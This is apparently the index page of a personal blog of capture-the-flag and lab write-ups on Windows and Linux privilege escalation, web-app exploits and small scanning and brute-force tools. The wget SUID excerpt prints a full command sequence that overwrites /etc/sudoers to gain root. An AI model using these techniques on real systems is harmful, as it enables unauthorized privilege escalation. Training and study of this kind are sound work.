[ FaisalFs.io ]

Abusing DNS Admin Membership by DLL Injection in “dns.exe” for PrivEsc in Active Directory

May 31, 2020 5 minute read

Resolute was a medium level Windows computer that included a list of users and login discoveries for the SMB system. This password has been pulsed into the SMB login via hydra to the usernames identified. The listing of the privilege escalation led us to another member of the DnsAdmins group. Then, by violating his admin’s right to charge the DLL injection to obtain the Admin shell.

Exploiting Adminer 4.6.2 File Disclosure Vulnerability & Python Library Hijacking for PrivEsc

May 21, 2020 7 minute read

Admirer is an easy box that need to exploit Adminer 4.6.2 to get credential for initial shell then abusing shutil module for python library hijacking to escalate into root shell.

adminer shutil python library hijacking

Exploiting Bug on the Python-based Web Server for RCE

May 17, 2020 11 minute read

It was a medium-difficulties Linux box that allowed players to spot an initial access bug on the python-based web server. Once we have initial access to the reverse shell, another script to encrypt the password would have to be examined to gain higher privilege

python source code encryption decryption

liveHostPortScan

May 02, 2020 less than 1 minute read

Discover live hosts in subnet and scan for open ports.

tool bash scanner

HttpWaf Login Bruteforce

April 23, 2020 1 minute read

Http Login Bruteforce python script with WAF fingerprint and Web Protection fingerprint

tool python scanner bruteforce

PrivEsc abusing Sudo (LD_PRELOAD)

April 17, 2020 1 minute read

noobuser@attackdefense:~$ id uid=999(noobuser) gid=999(noobuser) groups=999(noobuser) noobuser@attackdefense:~$ sudo -l Matching Defaults entries for noobuser on attackdefense: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD User noobuser may run the following commands on attackdefense: (root) NOPASSWD: /usr/sbin/apache2

privesc LD_PRELOAD linux

Exploiting MongoDB NoSQL Injection to Username:Password Enumeration & Java jjs SGID to Root Shell

April 17, 2020 5 minute read

Linux box of medium difficulty. The early shell used MongoDB to brute the user’s passwords using NoSQL bypass. To raise root privilege, it was enough for a system equipped with a permissive SUID.

mongodb jjs PrependSetuid jjs bash SUID

PrivEsc abusing WGET SUID

April 04, 2020 less than 1 minute read

https://www.ctf.live/challengedetails?cid=21 escape restricted shell fesal@rbash_attackdefense:~$ :set shell=/bin/bash :shell export PATH=.bin:/usr/bin/ echo $PATH use wget SUID to transfer file to /etc/sudoers cd /tmp vi sudoers :i[enter] - to edit file fesal ALL=(ALL) NOPASSWD:ALL :wq - - to save exit file python -m SimpleHTTPServer 8009 & -O /etc/sudoers ~~[why need '&' - to use terminal and simpleServer works in bg]~~ export URL=http://127.0.0.1:8009/sudoers export LFILE=/etc/sudoers wget $URL -O $LFILE sudo -i root@rbash_attackdefense:~$

privesc wget SUID

Exploiting OpenNetAdmin 18.1.1 & Escaping Nano to Root Shell

March 25, 2020 4 minute read

It has an OpenNetAdmin Web-based framework vulnerable to execution of Remote Code. We will compromise all users on the box after collecting some passwords and recon. One account has a sudo entry with nano root permissions which allows root privileges to raise.

OpenNetAdmin nano bin

Exploiting Redis 4.0.9 for RCE & Webmin 1.910 for PrivEsc

March 22, 2020 3 minute read

It’s an easy-rate box. We will exploit the Redis service to obtain the first interactive shell. Then, we will go up to the next user by reviewing further. We will use the documented CVE 2019–12840 vulnerability on the root shell to exploit the Webmin server.

redis webmin miniserv

Faisal Fs

Recent Posts